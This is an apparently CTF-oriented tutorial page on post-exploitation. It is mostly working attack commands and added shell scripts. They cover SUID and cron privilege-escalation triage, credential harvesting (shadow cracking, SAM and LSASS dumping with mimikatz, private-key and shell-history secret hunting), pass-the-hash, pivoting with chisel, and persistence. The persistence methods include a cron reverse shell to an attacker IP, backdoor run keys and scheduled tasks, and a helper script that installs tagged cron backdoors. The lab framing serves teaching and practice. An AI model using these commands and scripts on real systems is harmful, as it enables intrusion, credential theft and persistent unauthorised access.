Post-Exploitation

Maintaining access, escalating privileges, and moving laterally

14 min read · Updated 2026-04-16
#privilege-escalation #lateral-movement #persistence #pivoting #loot
TL;DR
  • The first minute on a new shell is for situational awareness — understand where you landed before running anything noisy
  • Automated enumeration (LinPEAS, WinPEAS) surfaces most of the common privilege escalation vectors in a few minutes; still read the raw output, the colour-coded highlights are hints, not a verdict
  • SUID binaries, writable cron jobs, and misconfigured sudo rules are the most common Linux privesc paths
  • Pass-the-Hash allows lateral movement using only the NT hash — plaintext passwords are not required
  • Every artefact you leave (uploaded tools, log entries, created accounts) is future forensic evidence — clean as you go

Overview

A shell is just the beginning. Post-exploitation covers everything that happens after initial access: understanding your position, escalating to root or SYSTEM, harvesting credentials, moving through the network, and establishing persistence. Speed and stealth are competing priorities — move fast enough to complete objectives, slow enough to avoid triggering alerts.


Prerequisites

  • You have a foothold — an active shell or Meterpreter session on a target
  • Familiar with both Linux and Windows command-line environments
  • Completed the Exploitation phase, or you have an equivalent entry point from a CTF challenge

Recommended lab: HackTheBox Tier 2+ machines. TryHackMe "Post-Exploitation Basics" room and the "Windows PrivEsc Arena" room. The PEASS-ng scripts (LinPEAS/WinPEAS) can be run on any of these machines to practise reading their output.


Situational Awareness

First minute of a new shell — understand where you landed before doing anything noisy.

bash
# Linux — who, what, where
id && whoami
uname -a
hostname
ip a 2>/dev/null || ifconfig -a   # older hosts have no iproute2
cat /etc/os-release
ps aux
env                               # credentials in environment variables are common

# Who else is logged in?
who
last -a | head -20

# What can we sudo?
sudo -l        # in a non-tty shell use sudo -n -l so it fails fast instead of hanging on a password prompt

powershell
# Windows — equivalent survey
whoami /all
systeminfo
ipconfig /all
net user
net localgroup administrators
tasklist /v

Privilege Escalation

Linux PrivEsc

bash
# Automated enumeration — run this first
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh 2>/dev/null | tee linpeas_output.txt

# SUID binaries — check against GTFOBins
find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null | xargs ls -la

# Cron jobs, and whether the scripts they execute are writable by you
cat /etc/crontab
ls -la /etc/cron*
# Every file writable by the current user (not only cron scripts): look for ones that root executes
find / -writable -type f -not -path "/proc/*" 2>/dev/null

# Kernel exploits — last resort: a failed kernel exploit can crash the box
uname -r   # compare against known vulns
searchsploit linux kernel $(uname -r | cut -d'-' -f1)
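A small triage script for the two manual checks above (SUID binaries and cron targets), added here as an example; it is not from the page or from PEASS-ng. It builds a throwaway fixture tree so it runs offline, and on a real host you call it with `/` as the root. It prints SUID binaries whose name is not in a stock set and cron jobs whose program file is writable by "other", which is the state that lets an unprivileged user hijack a root job. The fixture paths and the list of stock SUID binaries are assumptions.

```shell
#!/usr/bin/env bash
# Linux privesc triage: unusual SUID binaries and cron jobs that run a
# writable script. Added example; ROOT is "/" on a real target.

# SUID binaries whose basename is not in the stock set. The stock list is an
# assumption (roughly what a default Debian/Ubuntu install ships with).
unusual_suid() {
  local root="$1" f
  find "$root" -perm -4000 -type f 2>/dev/null | while IFS= read -r f; do
    case "$(basename "$f")" in
      passwd|sudo|su|mount|umount|chsh|chfn|gpasswd|newgrp|ping|fusermount|fusermount3|pkexec|ssh-keysign|chage|expiry) ;;
      *) printf '%s\n' "$f" ;;
    esac
  done
}

# Parse system crontab files (min hour dom mon dow user command) and report
# commands whose program file has the other-write bit set (-perm -0002).
writable_cron_scripts() {
  local root="$1" f line path
  for f in "$root/etc/crontab" "$root"/etc/cron.d/*; do
    [ -f "$f" ] || continue
    while IFS= read -r line; do
      case "$line" in
        ''|'#'*) continue ;;        # blank or comment
        [!0-9*@]*) continue ;;      # variable assignment such as SHELL= or PATH=
      esac
      set -f; set -- $line; set +f  # split fields without glob-expanding the * entries
      case "$1" in
        @*) path="${3:-}" ;;        # @reboot user command
        *)  path="${7:-}" ;;
      esac
      case "$path" in /*) ;; *) continue ;; esac   # only absolute paths can be checked
      if [ -n "$(find "$root$path" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
        printf '%s  (from %s)\n' "$path" "${f#"$root"}"
      fi
    done < "$f"
  done
}

# Constructed fixture: four stock SUID binaries, one odd one (find, a GTFOBins
# entry), and a root cron job that runs a mode-777 script.
mk_fixture() {
  local root b
  root="$(mktemp -d)"
  mkdir -p "$root/usr/bin" "$root/etc/cron.d" "$root/opt/backup"
  for b in passwd sudo su mount find; do
    : > "$root/usr/bin/$b"; chmod 4755 "$root/usr/bin/$b"
  done
  : > "$root/opt/backup/run.sh"; chmod 777 "$root/opt/backup/run.sh"
  printf 'SHELL=/bin/sh\n*/5 * * * * root /opt/backup/run.sh\n0 3 * * * root /usr/bin/passwd -S\n' \
    > "$root/etc/cron.d/backup"
  printf '%s\n' "$root"
}

# Stand-alone use: "./triage.sh /" on a target, "./triage.sh --demo" for the fixture.
if [ "${1:-}" = "--demo" ]; then
  root="$(mk_fixture)"
  echo "== unusual SUID =="; unusual_suid "$root"
  echo "== writable cron targets =="; writable_cron_scripts "$root"
  rm -rf "$root"
elif [ -n "${1:-}" ]; then
  unusual_suid "$1"; writable_cron_scripts "$1"
fi
```

The other-write check deliberately uses permission bits rather than `[ -w ]`: the latter answers "can I write this", which is true for anything you own, while a root job reading an other-writable file is the condition that matters regardless of who you are now.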

Windows PrivEsc

powershell
.\winPEASx64.exe

# Unquoted service paths — auto-start services outside C:\Windows whose binary path contains spaces but no quotes
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# wmic is removed from recent Windows builds; Get-CimInstance Win32_Service exposes the same Name, PathName and StartMode fields

# AlwaysInstallElevated — only exploitable when BOTH values are 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Token impersonation (SeImpersonatePrivilege) — typical for service accounts such as IIS or MSSQL
whoami /priv   # look for SeImpersonatePrivilege; "Disabled" describes the token state, the privilege is still usable
# > use PrintSpoofer or GodPotato
.\PrintSpoofer64.exe -i -c cmd

Credential Harvesting

Linux

bash
# Shadow file (needs root)
cat /etc/shadow
unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# SSH keys — modern keys are id_ed25519, not only id_rsa
find / \( -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" \) 2>/dev/null
find / \( -name "*.pem" -o -name "*.key" \) 2>/dev/null

# History files
cat ~/.bash_history
cat ~/.zsh_history
find / -name ".bash_history" 2>/dev/null
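Filename searches miss renamed keys and `.pem` files that are only certificates. The script below, added here as an example and not part of the page, hunts private keys by their PEM header instead and greps shell history for lines where a secret was typed on the command line. It runs against a constructed fixture tree; on a real host pass `/` (or a home directory) as the root. The secret patterns and fixture contents are assumptions.

```shell
#!/usr/bin/env bash
# Credential hunting on Linux: private keys found by content rather than
# name, and history lines carrying secrets. Added example; ROOT is "/" or
# a home directory on a real target.

# Any file whose content carries a PEM private-key header, whatever it is
# called. Certificates (BEGIN CERTIFICATE) and public keys do not match.
find_private_keys() {
  grep -rlE -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' "$1" 2>/dev/null | sort || :
}

# History lines where a password or token was passed on the command line.
# Pattern list is an assumption; extend it for the tooling present on the host.
SECRET_PATTERNS='sshpass -p|mysql( .*)? -p[^ ]|psql .*password=|curl( .*)? -u |wget .*--password|PASS(WORD|WD)?=|token=|Authorization:'
history_secrets() {                       # usage: history_secrets FILE...
  grep -HnEi -- "$SECRET_PATTERNS" "$@" 2>/dev/null || :
}

# Constructed fixture: a real-looking key, a renamed key, a public key, a
# certificate, and a history file with four leaky lines out of six.
mk_fixture() {
  local root
  root="$(mktemp -d)"
  mkdir -p "$root/home/dev/.ssh" "$root/opt/app" "$root/etc/ssl"
  printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed placeholder, no real key)\n-----END OPENSSH PRIVATE KEY-----\n' \
    > "$root/home/dev/.ssh/id_ed25519"
  printf 'ssh-ed25519 AAAAC3 dev@box (constructed placeholder)\n' > "$root/home/dev/.ssh/id_ed25519.pub"
  printf -- '-----BEGIN RSA PRIVATE KEY-----\n(constructed placeholder, no real key)\n-----END RSA PRIVATE KEY-----\n' \
    > "$root/opt/app/backup.txt"                       # a key hiding behind a harmless name
  printf -- '-----BEGIN CERTIFICATE-----\n(constructed placeholder)\n-----END CERTIFICATE-----\n' \
    > "$root/etc/ssl/cert.pem"                         # .pem but not a key
  printf '%s\n' \
    'ls -la' \
    'mysql -u root -pSup3rS3cret webapp' \
    "sshpass -p 'Winter2024' ssh deploy@10.0.0.7" \
    'export DB_PASSWORD=hunter2' \
    'cd /var/www' \
    'curl -u admin:admin http://intranet/api' \
    > "$root/home/dev/.bash_history"
  printf '%s\n' "$root"
}

# Stand-alone use: "./creds.sh /" on a target, "./creds.sh --demo" for the fixture.
if [ "${1:-}" = "--demo" ]; then
  root="$(mk_fixture)"
  echo "== private keys =="; find_private_keys "$root"
  echo "== secrets in history =="; history_secrets "$root/home/dev/.bash_history"
  rm -rf "$root"
elif [ -n "${1:-}" ]; then
  find_private_keys "$1"
  find "$1" -name '.*_history' -type f 2>/dev/null | while IFS= read -r h; do history_secrets "$h"; done
fi
```

On a large filesystem `grep -r` over `/` is slow and noisy in logs; scope it to home directories, `/opt`, `/etc` and `/var/backups`, which is where keys and history actually live.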

Windows

powershell
# SAM database (local accounts) — needs local admin
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
# Then offline: secretsdump.py -sam sam.bak -system system.bak LOCAL

# LSASS dump — needs local admin with SeDebugPrivilege; privilege::debug enables it
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
# Fails when LSA Protection (RunAsPPL) or Credential Guard is enabled, and the binary on disk is signatured by every AV

# Credential Manager
cmdkey /list

Lateral Movement

Pass-the-Hash

bash
# Authenticate with the NT hash instead of a plaintext password
# (8846f7... is the NT hash of "password"; aad3b4...04ee is the empty LM hash, which evil-winrm does not take)
evil-winrm -i 10.10.10.5 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c

# Via impacket — the argument is LMHASH:NTHASH, and the LM half may be left empty
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@10.10.10.5
wmiexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@10.10.10.5
# Remote UAC blocks PtH for local admin accounts other than the built-in RID 500 Administrator by default; domain accounts are unaffected

Pivoting

bash
# SSH local port forward — reach internal-server:80 as localhost:8080 on your machine
ssh -L 8080:internal-server:80 user@jumphost

# SSH dynamic proxy (SOCKS) — route tool traffic through the jumphost
ssh -D 1080 user@jumphost
# Then, with "socks5 127.0.0.1 1080" in proxychains.conf:
proxychains nmap -sT -Pn 192.168.1.0/24   # full-connect scans only: SOCKS carries no raw packets or ICMP

# Chisel — when SSH isn't available (reverse SOCKS: the listener appears on the attacker's 127.0.0.1:1080)
# On attacker:
chisel server -p 8000 --reverse
# On target:
chisel client 10.10.14.2:8000 R:1080:socks

Persistence

bash
# Linux — cron backdoor
# cron executes the line with /bin/sh, where >& and /dev/tcp do not exist, so wrap the shell in bash -c
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'") | crontab -

# Linux — SSH authorized key
echo "ssh-rsa AAAA...your-key..." >> ~/.ssh/authorized_keys
# sshd (StrictModes, on by default) ignores the file if ~/.ssh or authorized_keys is group- or world-writable: keep them 700/600

# Windows — registry run key (fires at the next logon of this user, not at boot)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"

# Windows — scheduled task (add /ru SYSTEM when running as admin)
schtasks /create /tn "WindowsUpdate" /tr "C:\Temp\payload.exe" /sc minute /mo 5

Operational Notes

  • Clean up artefacts — remove uploaded tools and created accounts, and keep a list of anything you could not remove for the report. Log clearing is itself an artefact: history -c only drops the current session (unset HISTFILE before you start instead), and clearing a Windows event log writes event 1102 (Security) or 104 (System), which SOC teams alert on. Do only what the rules of engagement allow.
  • Avoid Mimikatz on disk — use in-memory execution (Invoke-Mimikatz) or lsassy remotely.
  • Document lateral movement — map the network as you go, note credentials and their scope.
  • Keep shells alive — upgrade to meterpreter or establish SSH tunnels; raw netcat shells die easily.
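The cron backdoor in the Persistence section and the "clean up artefacts" note above are two halves of one routine: install once, and be able to remove exactly what you installed. The helper below is an added example, not part of the page. It tags every line it adds with an engagement marker (the tag value is an assumption), refuses to add a duplicate, and removes only tagged lines, leaving the administrator's own jobs intact. It reads crontab text on stdin and writes the result on stdout so it can be tested without touching a real crontab.

```shell
#!/usr/bin/env bash
# Tagged, idempotent crontab persistence with exact removal. Added example.
# On a target:  crontab -l 2>/dev/null | add_cron_entry '* * * * *' '<cmd>' | crontab -
# Cleanup:      crontab -l | remove_cron_entries | crontab -

CRON_TAG='# ops-2026-04'   # assumption: engagement marker so cleanup removes only our lines

# Print the crontab from stdin with one tagged entry appended. The command is
# wrapped in bash -c because cron runs lines under /bin/sh, which lacks >&
# and /dev/tcp. CMD must not itself contain single quotes.
add_cron_entry() {                 # usage: add_cron_entry SCHEDULE CMD < old > new
  local schedule="$1" cmd="$2" current entry
  entry="$schedule /bin/bash -c '$cmd' $CRON_TAG"
  current="$(cat)"
  if printf '%s\n' "$current" | grep -Fxq -- "$entry"; then
    printf '%s\n' "$current"       # already installed: leave the crontab untouched
  elif [ -z "$current" ]; then
    printf '%s\n' "$entry"         # user had no crontab
  else
    printf '%s\n' "$current" "$entry"
  fi
}

# Drop every line carrying our tag and nothing else.
remove_cron_entries() {            # usage: remove_cron_entries < old > new
  grep -Fv -- "$CRON_TAG" || :     # grep exits 1 when nothing remains; that is not an error here
}

# Stand-alone demo on a constructed crontab (never touches the real one).
demo() {
  local before after cleaned
  before="$(printf '%s\n' 'MAILTO=root' '0 2 * * * /usr/local/bin/backup.sh')"
  after="$(printf '%s\n' "$before" | add_cron_entry '* * * * *' 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1')"
  cleaned="$(printf '%s\n' "$after" | remove_cron_entries)"
  printf -- '--- installed ---\n%s\n--- cleaned ---\n%s\n' "$after" "$cleaned"
}

if [ "${1:-}" = "--demo" ]; then
  demo
fi
```

Installing through `crontab -` rewrites the user's spool file and is logged by cron on most systems; the value of the tag is that the removal step is exact, so the cleanup you report matches what was actually left behind.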

Related

  • Password Attacks — credential harvesting from this phase feeds directly into cracking and Active Directory attacks
  • Reconnaissance — pivot into a new network segment and you are back at step one
  • Forensics — understand the artefacts your actions leave behind for blue team to find